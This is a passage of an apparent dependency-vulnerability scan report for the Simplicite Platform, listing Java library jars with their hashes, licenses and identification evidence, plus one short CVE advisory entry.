Evidence Type Source Name Value Confidence Vendor file name curvesapi High Vendor jar package name graphbuilder Low Vendor jar package name math Low Vendor pom artifactid curvesapi Highest Vendor pom artifactid curvesapi Low Vendor pom developer id stormdollar Medium Vendor pom developer id virtuald Medium Vendor pom developer name Dustin Spicuzza Medium Vendor pom developer name stormdollar Medium Vendor pom groupid com.github.virtuald Highest Vendor pom name curvesapi High Vendor pom url virtuald/curvesapi Highest Product file name curvesapi High Product jar package name math Low Product pom artifactid curvesapi Highest Product pom developer id stormdollar Low Product pom developer id virtuald Low Product pom developer name Dustin Spicuzza Low Product pom developer name stormdollar Low Product pom groupid com.github.virtuald Highest Product pom name curvesapi High Product pom url virtuald/curvesapi High Version file version 1.06 High Version pom version 1.06 Highest
dec-0.1.2.jar
Description: Brotli is a generic-purpose lossless compression algorithm.
License: http://www.opensource.org/licenses/mit-license.php
File Path: /var/simplicite/.m2/repository/org/brotli/dec/0.1.2/dec-0.1.2.jar
MD5: 4b1cd14cf29733941cc536b27e6aedfa
SHA1: 0c26a897ae0d524809eef1c786cc6183b4ddcc3b
SHA256: 615c0c3efef990d77831104475fba6a1f7971388691d4bad1471ad84101f6d52
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name dec High Vendor jar package name brotli Highest Vendor jar package name dec Highest Vendor Manifest bundle-docurl http://brotli.org/dec Low Vendor Manifest bundle-symbolicname org.brotli.dec Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.5))" Low Vendor pom artifactid dec Highest Vendor pom artifactid dec Low Vendor pom groupid org.brotli Highest Vendor pom parent-artifactid parent Low Product file name dec High Product jar package name brotli Highest Product jar package name dec Highest Product Manifest bundle-docurl http://brotli.org/dec Low Product Manifest Bundle-Name org.brotli:dec Medium Product Manifest bundle-symbolicname org.brotli.dec Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.5))" Low Product pom artifactid dec Highest Product pom groupid org.brotli Highest Product pom parent-artifactid parent Medium Version file version 0.1.2 High Version Manifest Bundle-Version 0.1.2 High Version pom version 0.1.2 Highest
diffutils-1.3.0.jar
Description: The DiffUtils library for computing diffs, applying patches, and generating side-by-side views in Java.
License: The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/googlecode/java-diff-utils/diffutils/1.3.0/diffutils-1.3.0.jar
MD5: 638158a6bca62926aa9986c92ccb15e0
SHA1: 7e060dd5b19431e6d198e91ff670644372f60fbd
SHA256: 61ba4dc49adca95243beaa0569adc2a23aedb5292ae78aa01186fa782ebdc5c2
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name diffutils High Vendor jar package name diffutils Highest Vendor Manifest bundle-symbolicname com.googlecode.java-diff-utils.diffutils Medium Vendor pom artifactid diffutils Highest Vendor pom artifactid diffutils Low Vendor pom groupid com.googlecode.java-diff-utils Highest Vendor pom name java-diff-utils High Vendor pom url http://code.google.com/p/java-diff-utils/ Highest Product file name diffutils High Product jar package name diffutils Highest Product Manifest Bundle-Name java-diff-utils Medium Product Manifest bundle-symbolicname com.googlecode.java-diff-utils.diffutils Medium Product pom artifactid diffutils Highest Product pom groupid com.googlecode.java-diff-utils Highest Product pom name java-diff-utils High Product pom url http://code.google.com/p/java-diff-utils/ Medium Version file version 1.3.0 High Version Manifest Bundle-Version 1.3.0 High Version pom version 1.3.0 Highest
CVE-2021-4277
A vulnerability, which was classified as problematic, has been found in fredsmith utils. This issue affects some unknown processing of the file screenshot_sync of the component Filename Handler. The manipulation leads to predictable from observable state. The name of the patch is dbab1b66955eeb3d76b34612b358307f5c4e3944. It is recommended to apply a patch to fix this issue. The identifier VDB-216749 was assigned to this vulnerability. CWE-330 Use of Insufficiently Random Values
CVSSv3:
Base Score: MEDIUM (5.3)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
References:
Vulnerable Software & Versions:
docusign-esign-java-3.2.0.jar
Description: The official DocuSign eSignature JAVA client is based on version 2 of the DocuSign REST API and provides libraries for JAVA application integration. It is recommended that you use this version of the library for new development.
License: DocuSign Java Client License: https://raw.githubusercontent.com/docusign/docusign-java-client/master/LICENSE
File Path: /var/simplicite/.m2/repository/com/docusign/docusign-esign-java/3.2.0/docusign-esign-java-3.2.0.jar
MD5: b8145b4608f4320fd468328a51e8fd1d
SHA1: 24d1d0e4eed2a62ee8df1b8cb1f59b113916aaaa
SHA256: 5b63c9bd8b6054a909d38ca0fff961f19481edb980a8721fd8a835c6a4b2bd0f
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name docusign-esign-java High Vendor jar package name api Highest Vendor jar package name client Highest Vendor jar package name docusign Highest Vendor jar package name docusign Low Vendor jar package name esign Highest Vendor jar package name esign Low Vendor pom artifactid docusign-esign-java Highest Vendor pom artifactid docusign-esign-java Low Vendor pom developer email devcenter@docusign.com Low Vendor pom developer name DocuSign Developer Center Medium Vendor pom developer org DocuSign Medium Vendor pom developer org URL https://www.docusign.com/developer-center Medium Vendor pom groupid com.docusign Highest Vendor pom name docusign-esign-java High Vendor pom url https://www.docusign.com/developer-center Highest Product file name docusign-esign-java High Product jar package name api Highest Product jar package name client Highest Product jar package name docusign Highest Product jar package name esign Highest Product jar package name esign Low Product pom artifactid docusign-esign-java Highest Product pom developer email devcenter@docusign.com Low Product pom developer name DocuSign Developer Center Low Product pom developer org DocuSign Low Product pom developer org URL https://www.docusign.com/developer-center Low Product pom groupid com.docusign Highest Product pom name docusign-esign-java High Product pom url https://www.docusign.com/developer-center Medium Version file version 3.2.0 High Version pom version 3.2.0 Highest
docx4j-ImportXHTML-8.0.0.jar
Description: docx4j-ImportXHTML converts XHTML to OpenXML WordML (docx) using docx4j
License: LGPL v2.1: http://www.gnu.org/licenses/lgpl-2.1.html
File Path: /var/simplicite/.m2/repository/org/docx4j/docx4j-ImportXHTML/8.0.0/docx4j-ImportXHTML-8.0.0.jar
MD5: 24d6600cd4f8f594d64de4ed925bd417
SHA1: f90d3d0f0f1d4463a1172b1cb26f8cb02b16da09
SHA256: d89550699321099bc98c45b58abf608a03fba557668eaba1e3301cdb98e678f4
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name docx4j-ImportXHTML High Vendor jar package name convert Low Vendor jar package name docx4j Highest Vendor jar package name docx4j Low Vendor jar package name in Low Vendor pom artifactid docx4j-ImportXHTML Highest Vendor pom artifactid docx4j-ImportXHTML Low Vendor pom developer email jharrop@plutext.com Low Vendor pom developer id jharrop Medium Vendor pom developer name Jason Harrop Medium Vendor pom developer org Plutext Medium Vendor pom groupid org.docx4j Highest Vendor pom name docx4j-ImportXHTML High Vendor pom url http://www.docx4java.org/ Highest Product file name docx4j-ImportXHTML High Product jar package name convert Low Product jar package name docx4j Highest Product jar package name in Low Product jar package name xhtml Low Product pom artifactid docx4j-ImportXHTML Highest Product pom developer email jharrop@plutext.com Low Product pom developer id jharrop Low Product pom developer name Jason Harrop Low Product pom developer org Plutext Low Product pom groupid org.docx4j Highest Product pom name docx4j-ImportXHTML High Product pom url http://www.docx4java.org/ Medium Version file version 8.0.0 High Version pom version 8.0.0 Highest
docx4j-JAXB-ReferenceImpl-11.1.3.jar
Description: config specifying that docx4j should use the JAXB reference impls
License: Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/docx4j/docx4j-JAXB-ReferenceImpl/11.1.3/docx4j-JAXB-ReferenceImpl-11.1.3.jar
MD5: a16f24da44058c0420d291880212c4f2
SHA1: 809c0a0f30c2ed15749c423f331ec6e439a37c81
SHA256: 5174a6f8547e4a222f0ec25b2afc5bbe9b89c40ee19029a47072271d0d7ebb3c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name docx4j-JAXB-ReferenceImpl High Vendor jar package name docx4j Highest Vendor jar package name docx4j Low Vendor jar package name jaxb Highest Vendor jar package name jaxb Low Vendor jar package name ri Low Vendor pom artifactid docx4j-JAXB-ReferenceImpl Highest Vendor pom artifactid docx4j-JAXB-ReferenceImpl Low Vendor pom developer email jason@plutext.org Low Vendor pom developer name Jason Harrop Medium Vendor pom developer org Plutext Medium Vendor pom developer org URL http://www.plutext.com Medium Vendor pom groupid org.docx4j Highest Vendor pom name docx4j-JAXB-ReferenceImpl High Vendor pom url http://www.docx4java.org/docx4j-JAXB-ReferenceImpl/ Highest Product file name docx4j-JAXB-ReferenceImpl High Product jar package name docx4j Highest Product jar package name jaxb Highest Product jar package name jaxb Low Product jar package name ri Low Product pom artifactid docx4j-JAXB-ReferenceImpl Highest Product pom developer email jason@plutext.org Low Product pom developer name Jason Harrop Low Product pom developer org Plutext Low Product pom developer org URL http://www.plutext.com Low Product pom groupid org.docx4j Highest Product pom name docx4j-JAXB-ReferenceImpl High Product pom url http://www.docx4java.org/docx4j-JAXB-ReferenceImpl/ Medium Version file version 11.1.3 High Version pom version 11.1.3 Highest
docx4j-core-11.1.3.jar
Description: docx4j is a library which helps you to work with the Office Open XML file format as used in docx documents, pptx presentations, and xlsx spreadsheets.
License: Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/docx4j/docx4j-core/11.1.3/docx4j-core-11.1.3.jar
MD5: ca67b72739567c19dc2220ac01aa25a0
SHA1: a27d3aa8d7b640555e8732a8ae64fc2fb47ed6fc
SHA256: 7f3b9fd839047857ccee8658fd4d3452aa7b211befa137659113c158283c0d6f
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name docx4j-core High Vendor jar package name and Highest Vendor jar package name docx4j Highest Vendor jar package name docx4j Low Vendor jar package name format Highest Vendor jar package name in Highest Vendor jar package name org Highest Vendor jar package name xml Highest Vendor pom artifactid docx4j-core Highest Vendor pom artifactid docx4j-core Low Vendor pom developer email jason@plutext.org Low Vendor pom developer name Jason Harrop Medium Vendor pom developer org Plutext Medium Vendor pom developer org URL http://www.plutext.com Medium Vendor pom groupid org.docx4j Highest Vendor pom name docx4j-core High Vendor pom url http://www.docx4java.org/docx4j-core/ Highest Product file name docx4j-core High Product jar package name and Highest Product jar package name docx4j Highest Product jar package name format Highest Product jar package name in Highest Product jar package name org Highest Product jar package name xml Highest Product pom artifactid docx4j-core Highest Product pom developer email jason@plutext.org Low Product pom developer name Jason Harrop Low Product pom developer org Plutext Low Product pom developer org URL http://www.plutext.com Low Product pom groupid org.docx4j Highest Product pom name docx4j-core High Product pom url http://www.docx4java.org/docx4j-core/ Medium Version file version 11.1.3 High Version pom version 11.1.3 Highest
docx4j-openxml-objects-11.1.3.jar
Description: Our JAXB representation of OpenXML, except for pml and sml (handled separately)
License: Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/docx4j/docx4j-openxml-objects/11.1.3/docx4j-openxml-objects-11.1.3.jar
MD5: 62d7c2c9f18e0c0490f3b5a5c0791afd
SHA1: 8ce54d63a0c4fc2abf728bc84d61ec0ff53e9ff9
SHA256: 6e1fa1de6dfc3c21cab674df0e4fb8d7c00ce8046d2e62dd809c234f46e243c5
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name docx4j-openxml-objects High Vendor jar package name docx4j Highest Vendor jar package name docx4j Low Vendor jar package name org Highest Vendor pom artifactid docx4j-openxml-objects Highest Vendor pom artifactid docx4j-openxml-objects Low Vendor pom developer email jason@plutext.org Low Vendor pom developer name Jason Harrop Medium Vendor pom developer org Plutext Medium Vendor pom developer org URL http://www.plutext.com Medium Vendor pom groupid org.docx4j Highest Vendor pom name docx4j-openxml-objects High Vendor pom url http://www.docx4java.org/docx4j-openxml-objects/ Highest Product file name docx4j-openxml-objects High Product jar package name docx4j Highest Product jar package name org Highest Product pom artifactid docx4j-openxml-objects Highest Product pom developer email jason@plutext.org Low Product pom developer name Jason Harrop Low Product pom developer org Plutext Low Product pom developer org URL http://www.plutext.com Low Product pom groupid org.docx4j Highest Product pom name docx4j-openxml-objects High Product pom url http://www.docx4java.org/docx4j-openxml-objects/ Medium Version file version 11.1.3 High Version pom version 11.1.3 Highest
docx4j-openxml-objects-pml-11.1.3.jar
Description: Our JAXB representation of OpenXML Presentation Markup Language (pml)
License: Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/docx4j/docx4j-openxml-objects-pml/11.1.3/docx4j-openxml-objects-pml-11.1.3.jar
MD5: 52b5204c0ba4506c5e49f352e12cf8d4
SHA1: e0b2b913589e628a9fcc2807d82a189a828fb64d
SHA256: 0fcc05e5faba64dcd9a176effdf64aea3679900a6dcec9ab84649a7038992f3f
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name docx4j-openxml-objects-pml High Vendor jar package name pml Highest Vendor jar package name pml Low Vendor jar package name pptx4j Low Vendor pom artifactid docx4j-openxml-objects-pml Highest Vendor pom artifactid docx4j-openxml-objects-pml Low Vendor pom developer email jason@plutext.org Low Vendor pom developer name Jason Harrop Medium Vendor pom developer org Plutext Medium Vendor pom developer org URL http://www.plutext.com Medium Vendor pom groupid org.docx4j Highest Vendor pom name docx4j-openxml-objects-pml High Vendor pom url http://www.docx4java.org/docx4j-openxml-objects-pml/ Highest Product file name docx4j-openxml-objects-pml High Product jar package name pml Highest Product jar package name pml Low Product pom artifactid docx4j-openxml-objects-pml Highest Product pom developer email jason@plutext.org Low Product pom developer name Jason Harrop Low Product pom developer org Plutext Low Product pom developer org URL http://www.plutext.com Low Product pom groupid org.docx4j Highest Product pom name docx4j-openxml-objects-pml High Product pom url http://www.docx4java.org/docx4j-openxml-objects-pml/ Medium Version file version 11.1.3 High Version pom version 11.1.3 Highest
docx4j-openxml-objects-sml-11.1.3.jar
Description: Our JAXB representation of OpenXML Spreadsheet Markup Language (sml)
License: Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/docx4j/docx4j-openxml-objects-sml/11.1.3/docx4j-openxml-objects-sml-11.1.3.jar
MD5: 3ae8a40a473a961d8fd202b45e0088df
SHA1: a3e09cd4b4f8a16c957f5120bdab2bb2dcf3fbd1
SHA256: 20b73fade3c324698204aad0d6db4d23e771cfbdad80c8b66e1cf877f8c2bea5
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name docx4j-openxml-objects-sml High Vendor jar package name sml Highest Vendor jar package name sml Low Vendor jar package name xlsx4j Low Vendor pom artifactid docx4j-openxml-objects-sml Highest Vendor pom artifactid docx4j-openxml-objects-sml Low Vendor pom developer email jason@plutext.org Low Vendor pom developer name Jason Harrop Medium Vendor pom developer org Plutext Medium Vendor pom developer org URL http://www.plutext.com Medium Vendor pom groupid org.docx4j Highest Vendor pom name docx4j-openxml-objects-sml High Vendor pom url http://www.docx4java.org/docx4j-openxml-objects-sml/ Highest Product file name docx4j-openxml-objects-sml High Product jar package name sml Highest Product jar package name sml Low Product pom artifactid docx4j-openxml-objects-sml Highest Product pom developer email jason@plutext.org Low Product pom developer name Jason Harrop Low Product pom developer org Plutext Low Product pom developer org URL http://www.plutext.com Low Product pom groupid org.docx4j Highest Product pom name docx4j-openxml-objects-sml High Product pom url http://www.docx4java.org/docx4j-openxml-objects-sml/ Medium Version file version 11.1.3 High Version pom version 11.1.3 Highest
dtd-parser-1.4.1.jar
Description: SAX-like API for parsing XML DTDs.
License: Eclipse Distribution License - v 1.0: http://www.eclipse.org/org/documents/edl-v10.php
File Path: /var/simplicite/.m2/repository/com/sun/xml/dtd-parser/dtd-parser/1.4.1/dtd-parser-1.4.1.jar
MD5: 888996ba7078ccac5d93b19b28605ca7
SHA1: c5957db3100f10d1604141ae1545e59e774da2e6
SHA256: 7d02cf299162ed207df82a02079d1d9ac4569d34146b4c3ddc7f1de8f9711d46
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name dtd-parser High Vendor jar package name sun Highest Vendor jar package name xml Highest Vendor jar (hint) package name oracle Highest Vendor Manifest bundle-docurl https://www.eclipse.org Low Vendor Manifest bundle-symbolicname com.sun.xml.dtd-parser Medium Vendor Manifest implementation-build-id 1.4.1 - 1.4.1-RELEASE-6311975df010749c45208d306443e5384b80a5e4, 2018-12-28T12:17:18+0000 Low Vendor Manifest implementation-url https://github.com/eclipse-ee4j/jaxb-dtd-parser Low Vendor Manifest Implementation-Vendor Eclipse Foundation High Vendor Manifest Implementation-Vendor-Id com.sun.xml.dtd-parser Medium Vendor pom artifactid dtd-parser Highest Vendor pom artifactid dtd-parser Low Vendor pom developer email Roman.Grigoriadi@oracle.com Low Vendor pom developer id bravehorsie Medium Vendor pom developer name Roman Grigoriadi Medium Vendor pom groupid com.sun.xml.dtd-parser Highest Vendor pom name DTD Parser High Vendor pom parent-artifactid project Low Vendor pom parent-groupid org.eclipse.ee4j Medium Vendor pom url eclipse-ee4j/jaxb-dtd-parser Highest Product file name dtd-parser High Product jar package name sun Highest Product jar package name xml Highest Product Manifest bundle-docurl https://www.eclipse.org Low Product Manifest Bundle-Name DTD Parser Medium Product Manifest bundle-symbolicname com.sun.xml.dtd-parser Medium Product Manifest implementation-build-id 1.4.1 - 1.4.1-RELEASE-6311975df010749c45208d306443e5384b80a5e4, 2018-12-28T12:17:18+0000 Low Product Manifest Implementation-Title DTD Parser High Product Manifest implementation-url https://github.com/eclipse-ee4j/jaxb-dtd-parser Low Product pom artifactid dtd-parser Highest Product pom developer email Roman.Grigoriadi@oracle.com Low Product pom developer id bravehorsie Low Product pom developer name Roman Grigoriadi Low Product pom groupid com.sun.xml.dtd-parser Highest Product pom name DTD Parser High Product pom parent-artifactid project Medium Product pom parent-groupid org.eclipse.ee4j Medium Product pom url eclipse-ee4j/jaxb-dtd-parser High Version file version 1.4.1 High Version Manifest Bundle-Version 1.4.1 High Version Manifest implementation-build-id 1.4.1 Low Version Manifest Implementation-Version 1.4.1 High Version pom parent-version 1.4.1 Low Version pom version 1.4.1 Highest
ehcache-core-2.6.2.jar
Description: This is the ehcache core module. Pair it with other modules for added functionality.
License: The Apache Software License, Version 2.0: src/assemble/EHCACHE-CORE-LICENSE.txt
File Path: /var/simplicite/.m2/repository/net/sf/ehcache/ehcache-core/2.6.2/ehcache-core-2.6.2.jar
MD5: b6abecd2c01070700a9001b33b94b3f4
SHA1: 3baecd92015a9f8fe4cf51c8b5d3a5bddcdd3e86
SHA256: df61f1a1724aa674d922dce21965b907df8f77e730679ae1abe92679390a2fd6
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name ehcache-core High Vendor jar package name ehcache Highest Vendor jar package name net Highest Vendor jar package name sf Highest Vendor pom artifactid ehcache-core Highest Vendor pom artifactid ehcache-core Low Vendor pom groupid net.sf.ehcache Highest Vendor pom name Ehcache Core High Vendor pom parent-artifactid ehcache-parent Low Vendor pom url http://ehcache.org Highest Product file name ehcache-core High Product jar package name ehcache Highest Product jar package name net Highest Product jar package name sf Highest Product pom artifactid ehcache-core Highest Product pom groupid net.sf.ehcache Highest Product pom name Ehcache Core High Product pom parent-artifactid ehcache-parent Medium Product pom url http://ehcache.org Medium Version file version 2.6.2 High Version pom parent-version 2.6.2 Low Version pom version 2.6.2 Highest
ehcache-core-2.6.2.jar: sizeof-agent.jar
File Path: /var/simplicite/.m2/repository/net/sf/ehcache/ehcache-core/2.6.2/ehcache-core-2.6.2.jar/net/sf/ehcache/pool/sizeof/sizeof-agent.jar
MD5: 5ad919b3ac0516897bdca079c9a222a8
SHA1: e86399a80ae6a6c7a563717eaa0ce9ba4708571c
SHA256: 3bcd560ca5f05248db9b689244b043e9c7549e3791281631a64e5dfff15870d2
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name sizeof-agent High Vendor jar package name ehcache Highest Vendor jar package name net Highest Vendor jar package name sf Highest Vendor Manifest hudson-build-number 6 Low Vendor Manifest hudson-project sizeof-agent_sizeof-agent-1.0.1_publisher Low Vendor Manifest jenkins-build-number 6 Low Vendor Manifest jenkins-project sizeof-agent_sizeof-agent-1.0.1_publisher Low Vendor pom artifactid sizeof-agent Low Vendor pom groupid net.sf.ehcache Highest Vendor pom name Ehcache Size-Of Agent High Vendor pom parent-artifactid ehcache-parent Low Vendor pom url http://www.ehcache.org Highest Product file name sizeof-agent High Product jar package name ehcache Highest Product jar package name net Highest Product jar package name sf Highest Product Manifest hudson-build-number 6 Low Product Manifest hudson-project sizeof-agent_sizeof-agent-1.0.1_publisher Low Product Manifest jenkins-build-number 6 Low Product Manifest jenkins-project sizeof-agent_sizeof-agent-1.0.1_publisher Low Product pom artifactid sizeof-agent Highest Product pom groupid net.sf.ehcache Highest Product pom name Ehcache Size-Of Agent High Product pom parent-artifactid ehcache-parent Medium Product pom url http://www.ehcache.org Medium Version pom parent-version 1.0.1 Low Version pom version 1.0.1 Highest
error_prone_annotations-2.3.2.jar
License: Apache 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/google/errorprone/error_prone_annotations/2.3.2/error_prone_annotations-2.3.2.jar
MD5: 42c8312a7eb4b6ff612049c4f7b514a6
SHA1: d1a0c5032570e0f64be6b4d9c90cdeb103129029
SHA256: 357cd6cfb067c969226c442451502aee13800a24e950fdfde77bcdb4565a668d
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name error_prone_annotations High Vendor jar package name annotations Highest Vendor jar package name annotations Low Vendor jar package name errorprone Highest Vendor jar package name errorprone Low Vendor jar package name google Highest Vendor jar package name google Low Vendor pom artifactid error_prone_annotations Highest Vendor pom artifactid error_prone_annotations Low Vendor pom groupid com.google.errorprone Highest Vendor pom name error-prone annotations High Vendor pom parent-artifactid error_prone_parent Low Product file name error_prone_annotations High Product jar package name annotations Highest Product jar package name annotations Low Product jar package name errorprone Highest Product jar package name errorprone Low Product jar package name google Highest Product pom artifactid error_prone_annotations Highest Product pom groupid com.google.errorprone Highest Product pom name error-prone annotations High Product pom parent-artifactid error_prone_parent Medium Version file version 2.3.2 High Version pom version 2.3.2 Highest
failureaccess-1.0.1.jar
Description: Contains com.google.common.util.concurrent.internal.InternalFutureFailureAccess and InternalFutures. Most users will never need to use this artifact. Its classes are conceptually a part of Guava, but they're in this separate artifact so that Android libraries can use them without pulling in all of Guava (just as they can use ListenableFuture by depending on the listenablefuture artifact).
License: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/google/guava/failureaccess/1.0.1/failureaccess-1.0.1.jar
MD5: 091883993ef5bfa91da01dcc8fc52236
SHA1: 1dcf1de382a0bf95a3d8b0849546c88bac1292c9
SHA256: a171ee4c734dd2da837e4b16be9df4661afab72a41adaf31eb84dfdaf936ca26
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name failureaccess High Vendor jar package name common Highest Vendor jar package name concurrent Highest Vendor jar package name google Highest Vendor jar package name util Highest Vendor Manifest bundle-docurl https://github.com/google/guava/ Low Vendor Manifest bundle-symbolicname com.google.guava.failureaccess Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor pom artifactid failureaccess Highest Vendor pom artifactid failureaccess Low Vendor pom groupid com.google.guava Highest Vendor pom name Guava InternalFutureFailureAccess and InternalFutures High Vendor pom parent-artifactid guava-parent Low Product file name failureaccess High Product jar package name common Highest Product jar package name concurrent Highest Product jar package name google Highest Product jar package name util Highest Product Manifest bundle-docurl https://github.com/google/guava/ Low Product Manifest Bundle-Name Guava InternalFutureFailureAccess and InternalFutures Medium Product Manifest bundle-symbolicname com.google.guava.failureaccess Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product pom artifactid failureaccess Highest Product pom groupid com.google.guava Highest Product pom name Guava InternalFutureFailureAccess and InternalFutures High Product pom parent-artifactid guava-parent Medium Version file version 1.0.1 High Version Manifest Bundle-Version 1.0.1 High Version pom parent-version 1.0.1 Low Version pom version 1.0.1 Highest
fast-and-simple-minify-1.0.jar
Description: fast-and-simple-minify is a combined java-port of the JSMin and CSSMin utility with some additional features
License: The Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/ch/simschla/fast-and-simple-minify/1.0/fast-and-simple-minify-1.0.jar
MD5: 762fd1d990bb4e97a7581d2cd3255fc1
SHA1: ade6ae013ee38869b79eeb0661203451ddc16f46
SHA256: 86e94527a0705c1ac20ff2b80e7d673975cc92f988210cc440f5bd1bb44087b5
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name fast-and-simple-minify High Vendor jar package name ch Highest Vendor jar package name ch Low Vendor jar package name minify Highest Vendor jar package name minify Low Vendor jar package name simschla Highest Vendor jar package name simschla Low Vendor pom artifactid fast-and-simple-minify Highest Vendor pom artifactid fast-and-simple-minify Low Vendor pom developer email github@survive.ch Low Vendor pom developer name Simon Schlachter Medium Vendor pom groupid ch.simschla Highest Vendor pom name fast-and-simple-minify High Vendor pom url simschla/fast-and-simple-minify Highest Product file name fast-and-simple-minify High Product jar package name ch Highest Product jar package name minify Highest Product jar package name minify Low Product jar package name simschla Highest Product jar package name simschla Low Product pom artifactid fast-and-simple-minify Highest Product pom developer email github@survive.ch Low Product pom developer name Simon Schlachter Low Product pom groupid ch.simschla Highest Product pom name fast-and-simple-minify High Product pom url simschla/fast-and-simple-minify High Version file version 1.0 High Version pom version 1.0 Highest
firebase-admin-6.10.0.jar
Description: This is the official Firebase Admin Java SDK. Build extraordinary native JVM apps in minutes with Firebase. The Firebase platform can power your app’s backend, user authentication, static hosting, and more.
License: Apache License, Version 2.0: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/google/firebase/firebase-admin/6.10.0/firebase-admin-6.10.0.jar
MD5: 2e4f38074123d07a7b5ada38532bc1ef
SHA1: 67e5c43ca7e06f6d5c00f4c02aeabaaaed2efcaf
SHA256: 74f681266b4e87d3b9c356d37773d0b6da6963f7c939eafc2622f2df7f2426cd
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name firebase-admin High Vendor jar package name database Low Vendor jar package name firebase Highest Vendor jar package name firebase Low Vendor jar package name google Highest Vendor jar package name google Low Vendor pom artifactid firebase-admin Highest Vendor pom artifactid firebase-admin Low Vendor pom developer id firebase Medium Vendor pom developer name Firebase Medium Vendor pom developer org Firebase Medium Vendor pom developer org URL https://firebase.google.com/ Medium Vendor pom groupid com.google.firebase Highest Vendor pom name firebase-admin High Vendor pom organization name Firebase High Vendor pom organization url https://firebase.google.com/ Medium Vendor pom url https://firebase.google.com/ Highest Product file name firebase-admin High Product jar package name database Low Product jar package name firebase Highest Product jar package name firebase Low Product jar package name google Highest Product pom artifactid firebase-admin Highest Product pom developer id firebase Low Product pom developer name Firebase Low Product pom developer org Firebase Low Product pom developer org URL https://firebase.google.com/ Low Product pom groupid com.google.firebase Highest Product pom name firebase-admin High Product pom organization name Firebase Low Product pom organization url https://firebase.google.com/ Low Product pom url https://firebase.google.com/ Medium Version file version 6.10.0 High Version pom version 6.10.0 Highest
fontbox-2.0.16.jar
Description: The Apache FontBox library is an open source Java tool to obtain low level information from font files. FontBox is a subproject of Apache PDFBox.
License: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/pdfbox/fontbox/2.0.16/fontbox-2.0.16.jar
MD5: 08bfafc724b3ac2682a8cac0dccedc5d
SHA1: 3f7819279a0b90a01b07a870d1d27dffd8de24db
SHA256: a0934197824808d612d494cac653256f2877665607cd63313ceecefb15479f9c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name fontbox High Vendor jar package name apache Highest Vendor jar package name fontbox Highest Vendor Manifest bundle-docurl http://pdfbox.apache.org Low Vendor Manifest bundle-symbolicname org.apache.pdfbox.fontbox Medium Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.pdfbox Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid fontbox Highest Vendor pom artifactid fontbox Low Vendor pom groupid org.apache.pdfbox Highest Vendor pom name Apache FontBox High Vendor pom parent-artifactid pdfbox-parent Low Vendor pom url http://pdfbox.apache.org/ Highest Product file name fontbox High Product jar package name apache Highest Product jar package name fontbox Highest Product Manifest bundle-docurl http://pdfbox.apache.org Low Product Manifest Bundle-Name Apache FontBox Medium Product Manifest bundle-symbolicname org.apache.pdfbox.fontbox Medium Product Manifest Implementation-Title Apache FontBox High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product Manifest specification-title Apache FontBox Medium Product pom artifactid fontbox Highest Product pom groupid org.apache.pdfbox Highest Product pom name Apache FontBox High Product pom parent-artifactid pdfbox-parent Medium Product pom url http://pdfbox.apache.org/ Medium Version file version 2.0.16 High Version Manifest Bundle-Version 2.0.16 High Version Manifest Implementation-Version 2.0.16 High Version pom version 2.0.16 Highest
fuzzywuzzy-1.2.0.jar (shaded: me.xdrop:diffutils:1.3)
File Path: /var/simplicite/.m2/repository/me/xdrop/fuzzywuzzy/1.2.0/fuzzywuzzy-1.2.0.jar/META-INF/maven/me.xdrop/diffutils/pom.xml
